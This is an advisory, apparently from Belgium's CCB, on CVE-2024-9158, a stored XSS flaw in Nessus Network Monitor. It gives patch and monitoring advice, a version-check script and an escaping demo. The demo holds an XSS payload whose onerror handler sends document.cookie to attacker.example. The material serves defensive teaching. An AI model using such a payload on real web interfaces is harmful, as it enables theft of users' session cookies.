WARNING: HIGH NESSUS NETWORK MONITOR VULNERABILITY

Published: 02/10/2024

Reference:
Advisory #2024-234

Version:
1.0

Affected software:
Nessus Network Monitor (version: 6.4.1 and earlier)

Type:
Cross Site Scripting (XSS), Remote Code Execution (RCE)

CVE/CVSS:
CVE-2024-9158: CVSS 8.4 (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H)

Sources

https://www.tenable.com/security/tns-2024-17

Risks

This vulnerability has a high impact on all three aspects of the CIA triad (Confidentiality, Integrity, Availability), as reflected by the C:H/I:H/A:H components of the CVSS vector.
It is unknown whether this vulnerability has been exploited.

Description

A remote, authenticated threat actor who has already obtained high privileges, such as an administrator role, can inject arbitrary HTML and script code into the Nessus Network Monitor user interface (UI) through the local command line interface (CLI). Because the injected code is rendered by the UI, it executes in the browser of any user who views the affected page, which is why the CVSS vector records a scope change (S:C) and requires user interaction (UI:R).

The root cause is insufficient sanitization of user-supplied data before it is rendered in the NNM UI.
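To make the flaw class concrete, the following is an added illustration and not code from NNM, Tenable or the CCB: a value that a privileged user could supply (here a constructed sensor label) is rendered into a page fragment once by plain string concatenation and once after HTML escaping. The table-cell template, the label value and the helper names are all assumptions made for this example.

```javascript
// Added illustration of the stored-XSS pattern described above (not NNM code).
// A privileged user supplies a value through some management interface; later the
// web UI renders that value into a page that other users view. Concatenating it
// straight into HTML lets any markup it contains become part of the page;
// escaping it first keeps it as inert text.

// Constructed attacker-supplied value: a plausible label that breaks out of a
// double-quoted attribute and adds an element with an event handler.
const ATTACKER_VALUE =
  'sensor-01"><img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Vulnerable pattern: untrusted data concatenated into HTML without encoding.
function renderUnsafe(label) {
  return '<td class="name">' + label + '</td>';
}

// Hardened pattern: encode the characters that can change markup structure in
// text content and in double- or single-quoted attribute values.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderSafe(label) {
  return '<td class="name">' + escapeHtml(label) + '</td>';
}

// Lists the element names that appear in a fragment. The template contributes
// exactly one <td> pair; anything else came from the injected value.
function elementNames(html) {
  const names = [];
  const re = /<\/?([a-zA-Z][\w-]*)/g;
  let m;
  while ((m = re.exec(html)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Stand-alone run: show both renderings side by side.
console.log('unsafe :', renderUnsafe(ATTACKER_VALUE), elementNames(renderUnsafe(ATTACKER_VALUE)));
console.log('safe   :', renderSafe(ATTACKER_VALUE), elementNames(renderSafe(ATTACKER_VALUE)));
```

Escaping is context-specific: `escapeHtml` is sufficient for text nodes and quoted attribute values, but a value placed inside a `<script>` block, a URL or a CSS property needs the encoding for that context, and a template engine that auto-escapes by default removes the chance of forgetting the call.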

Recommended Actions

Patch
 
The Centre for Cybersecurity Belgium (CCB) strongly recommends installing updates for vulnerable devices with the highest priority, after thorough testing.
Make sure to update NNM to version 6.5.0 or higher; NNM 6.4.1 and earlier remain affected.
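As an added example (not a CCB or Tenable tool), the following check flags installations whose version falls in the affected range stated in this advisory (6.4.1 and earlier; fixed in 6.5.0). Version components are compared as integers because a plain string comparison would wrongly rank 6.10.0 below 6.5.0. The inventory entries, hostnames and function names are constructed for the example.

```javascript
// Added example: classify NNM versions against the fixed release named above.
const FIXED_VERSION = '6.5.0';

// Parse "major.minor.patch" into integers; a missing trailing component counts as 0.
function parseVersion(v) {
  const parts = String(v).trim().split('.').map((p) => parseInt(p, 10));
  if (parts.length === 0 || parts.some((n) => Number.isNaN(n))) {
    throw new Error(`unparseable version: ${v}`);
  }
  while (parts.length < 3) parts.push(0);
  return parts;
}

// Comparator: negative if a < b, zero if equal, positive if a > b.
function compareVersions(a, b) {
  const pa = parseVersion(a);
  const pb = parseVersion(b);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d;
  }
  return 0;
}

// Affected means strictly older than the fixed release.
function isAffected(version) {
  return compareVersions(version, FIXED_VERSION) < 0;
}

// Constructed inventory sample; hostnames and versions are made up.
const INVENTORY = [
  { host: 'nnm-01.example.internal', version: '6.4.1' },
  { host: 'nnm-02.example.internal', version: '6.5.0' },
  { host: 'nnm-03.example.internal', version: '6.3.0' },
];

// Returns the hostnames that still need the update.
function affectedHosts(inventory) {
  return inventory.filter((e) => isAffected(e.version)).map((e) => e.host);
}

console.log('hosts still to patch:', affectedHosts(INVENTORY));
```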
 
Monitor/Detect
 
The CCB recommends that organisations scale up their monitoring and detection capabilities to identify any related suspicious activity, ensuring a swift response in case of an intrusion.
In case of an intrusion, you can report an incident via: https://ccb.belgium.be/cert/report-incident
While patching appliances or software to the newest version protects against future exploitation, it does not remediate a compromise that has already taken place.

References